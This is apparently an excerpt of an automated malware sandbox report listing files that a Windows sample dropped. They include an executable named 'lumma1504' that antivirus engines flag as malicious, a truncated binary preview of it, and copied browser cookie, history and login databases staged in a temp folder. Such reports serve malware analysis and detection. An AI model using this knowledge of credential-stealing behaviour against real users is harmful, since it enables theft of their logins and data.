                                                                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSIUpdaterV202.exe.log

                                                                                                                                            Download File
                                                                                                                                            Process:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):42
                                                                                                                                            Entropy (8bit):4.0050635535766075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                            MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                            SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                            SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oRkIPIEeryat7GMgjkBr.exe.log

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):42
                                                                                                                                            Entropy (8bit):4.0050635535766075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                            MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                            SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                            SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):315904
                                                                                                                                            Entropy (8bit):7.9900301024348765
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:6144:DVa+NrJiVBc2wc6oKXwdUWFQg1SGWEWAMiY7ivtaqgntTZXHAYq7:J1NrJaBcOOiHWEWAMFKtdstTfq
                                                                                                                                            MD5:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            SHA1:D44B5C6DD64284F00D6F9D05CF5327A91CAD9339
                                                                                                                                            SHA-256:F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                                                                                                                                            SHA-512:F419ADF4BD07CE18D9B7DE7445B2D0185653DE27738FD4403F880EE11BF49CA8A1958C1B2C94F8F4C5DA52EBC79462CFB6FE71849439F6AF017A95B44AF2F77B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                            • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: qk9TaBBxh8.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: TANQUIVUIA.exe, Detection: malicious, Browse
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5..........."...0.............~2... ........@.. .......................@............`.................................,2..O............................ .......1..8............................................ ............... ..H............text...H.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`2......H........$.................................................................]*....0..#.........i. .......... .............+B.....- ....d....(....(...............+.......(...........o......X.. ....2.....+7. ....... ..............XX.. ....]...................X.. ....2........+f...+T..X ....].....X ....]...........&...................X ....]..........%G....a.R...X......i2....X.....2.*...................(....*n .........%.....(.........*.0..H.........89.....P......%G ....X.R.P....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\02zdBXl47cvzcookies.sqlite

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98304
                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\3b6N2Xdh3CYwplaces.sqlite

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5242880
                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\4yAbYkouo2kFHistory

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):159744
                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\6fh90gXBIXtLCookies

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28672
                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\BlbScHFwlLfTWeb Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\D87fZN3R3jFeplaces.sqlite

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5242880
                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\Dssi8APnhY2JHistory

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):126976
                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\LBC6lg2YJ3HXLogin Data For Account

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\McwFytJF8a_xHistory

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):126976
                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\PGpLy2WBlLFSWeb Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106496
                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\SMhcoWrJBtJiHistory

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):159744
                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\YdLSeGsJxirBWeb Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\_TP0jqeyFqX_Web Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106496
                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\btyqKjO2JbORWeb Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\hFeN_nRcyMkILogin Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\i8Wb7Rd9dTs_Login Data

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):315904
                                                                                                                                            Entropy (8bit):7.9900301024348765
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:6144:DVa+NrJiVBc2wc6oKXwdUWFQg1SGWEWAMiY7ivtaqgntTZXHAYq7:J1NrJaBcOOiHWEWAMFKtdstTfq
                                                                                                                                            MD5:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            SHA1:D44B5C6DD64284F00D6F9D05CF5327A91CAD9339
                                                                                                                                            SHA-256:F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                                                                                                                                            SHA-512:F419ADF4BD07CE18D9B7DE7445B2D0185653DE27738FD4403F880EE11BF49CA8A1958C1B2C94F8F4C5DA52EBC79462CFB6FE71849439F6AF017A95B44AF2F77B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                            • Antivirus: Virustotal, Detection: 77%, Browse
